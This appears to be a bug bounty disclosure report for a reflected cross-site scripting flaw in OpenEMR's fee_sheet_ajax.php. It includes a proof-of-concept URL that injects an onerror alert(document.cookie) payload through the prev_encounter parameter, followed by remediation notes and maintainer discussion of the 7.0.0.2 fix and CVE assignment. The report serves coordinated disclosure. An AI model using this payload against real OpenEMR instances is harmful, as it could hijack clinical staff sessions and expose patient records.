Cross Site Scripting (reflected) on fee_sheet_ajax.php in openemr/openemr

Valid

Reported on

Aug 18th 2022


Description

When testing the app for XSS we found out that the fee_sheet_ajax.php endpoint is actually vulnerable to an XSS exploit.

PoC

  1. visit https://<openemr-instance>/interface/forms/fee_sheet/review/fee_sheet_ajax.php?task=retrieve&mode=encounters&prev_encounter=%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E

OWASP Category

A03:2021-Injection

Remediation

Add text() to https://github.com/openemr/openemr/blob/master/interface/forms/fee_sheet/review/fee_sheet_ajax.php#L65

Impact

The impact of an exploited XSS vulnerability varies a lot. It ranges from Session Hijacking to the disclosure of sensitive data, CSRF attacks and more. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.

We are processing your report and will contact the openemr team within 24 hours. 9 months ago
Kusuman modified the report
9 months ago
Kusuman modified the report
9 months ago
We have contacted a member of the openemr team and are waiting to hear back 9 months ago
stephen waite validated this vulnerability 9 months ago

Thanks for the report. A preliminary fix has been posted in this PR: https://github.com/openemr/openemr/pull/5695

Please do not create a CVE # or make this vulnerability public at this time. We will make this fix official about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 1-3 weeks. After we do that, then will be ok to make CVE # and make it public.

Thanks!

Kusuman has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kusuman
9 months ago

Researcher


Okay, thank you.

We have sent a fix follow up to the openemr team. We will try again in 7 days. 9 months ago
We have sent a second fix follow up to the openemr team. We will try again in 10 days. 8 months ago
We have sent a third and final fix follow up to the openemr team. This report is now considered stale. 8 months ago
Brady Miller
7 months ago

Maintainer


Updating that fix is in PR for rel-700 branch which will be in next 7.0.0 patch 2 (7.0.0.2): https://github.com/openemr/openemr/pull/5808 (after we bring this PR in, will then mark this item as fixed)

Brady Miller marked this as fixed in 7.0.0.2 with commit d5eb41 6 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
fee_sheet_ajax.php#L65 has been validated
Brady Miller
6 months ago

Maintainer


Plan to "Publish" this about 1 week after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 2-4 weeks.

Brady Miller
6 months ago

Maintainer


@admin , I made an error in the version that this will be fixed in. It should be 7.0.0.2 and not 7.0.2.

Ben Harvie
6 months ago

Admin


I have updated the fixed version to 7.0.0.2 as requested :)

Kusuman
6 months ago

Researcher


confirmed, it's no longer vulnerable, @admin can we assign a CVE to this vulnerability?

Brady Miller
6 months ago

Maintainer


hi @kusuman, we will likely be releasing the 7.0.0.2 patch this weekend. After we release the 7.0.0.2 patch, then we will "Publish" this vulnerability, which per my understanding will also then assign it a CVE.

Kusuman
6 months ago

Researcher


Got it, thanks.

Brady Miller published this vulnerability 5 months ago
Kusuman
5 months ago

Researcher


@admin can we assign a CVE to this vulnerability?

Brady Miller
5 months ago

Maintainer


@admin, when I published this, I did ensure the CVE toggle was on, but nothing populated/changed in the gui when I did that.

Pavlos
5 months ago

Admin


Sorry about that, we changed our UX. We'll make sure it gets a CVE

to join this conversation